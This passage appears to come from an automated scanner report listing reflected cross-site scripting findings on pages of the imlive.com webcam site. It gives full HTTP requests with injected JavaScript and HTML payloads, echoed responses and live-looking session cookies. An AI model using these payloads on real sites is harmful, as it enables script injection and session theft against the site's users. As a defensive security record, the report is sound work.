Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /become_host.asp?8175d"><a>ad0c10fb84f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:23 GMT Connection: close Content-Length: 21593 Vary: Accept-Encoding
2.56. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/becomehost.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb67'-alert(1)-'15501fee645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /becomehost.aspx?cbb67'-alert(1)-'15501fee645=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 21781 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
2.57. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/becomehost.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae13c"><a>8ef4c400f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /becomehost.aspx?ae13c"><a>8ef4c400f3a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 21593 Vary: Accept-Encoding
2.58. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/categoryfs.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1290d'><a>0243a0c9435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /categoryfs.asp?cat=232&1290d'><a>0243a0c9435=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:30 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:30 GMT Connection: close Content-Length: 18966 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232^1290d'><a>0243a0c9435=1&lr=1107816009&ud=0&pe=categoryfs.asp&qs=cat=232^1290d'> ...[SNIP]...
2.59. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/categoryms.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61172'><a>3b9652ee722 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /categoryms.asp?cat=2&61172'><a>3b9652ee722=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:32 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:32 GMT Connection: close Content-Length: 21858 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2^61172'><a>3b9652ee722=1&lr=1107816009&ud=0&pe=categoryms.asp&qs=cat=2^61172'> ...[SNIP]...
2.60. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/celebrity-porn-stars/celebrity-events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db582'-alert(1)-'4b3c1d175fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celebrity-porn-stars/celebrity-events/?db582'-alert(1)-'4b3c1d175fb=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 2667 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> War ...[SNIP]... <script type="text/javascript"> function IAgree(){document.location.href='?meAgree=yes&redirect=%2fcelebrity-porn-stars%2fcelebrity-events%2f%3fdb582'-alert(1)-'4b3c1d175fb%3d1'; return false;} function IDontAgree() { window.parent.location.href = "/"; return false; } </script> ...[SNIP]...
2.61. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/disclaimer.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd26f'><a>d83acef05af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /disclaimer.asp?cd26f'><a>d83acef05af=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:16 GMT Connection: close Content-Length: 78891 Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
<link rel="stylesheet" typ ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp?cd26f'><a>d83acef05af=1&lr=1107816009&ud=0&pe=disclaimer.asp&qs=cd26f'> ...[SNIP]...
2.62. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/forgot.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e80f3'-alert(1)-'c0da0968686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forgot.aspx?e80f3'-alert(1)-'c0da0968686=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:43 GMT Connection: close Content-Length: 3338 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Imlive.com Customer Serv ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx?e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
2.63. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/homepagems3.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62a5"><a>8b3d580d15c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /homepagems3.asp?e62a5"><a>8b3d580d15c=1 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
2.64. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/homepagems3.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ef1f'><a>f607da23703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /homepagems3.asp?6ef1f'><a>f607da23703=1 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
2.65. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ff1"><a>7cdd9e5718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
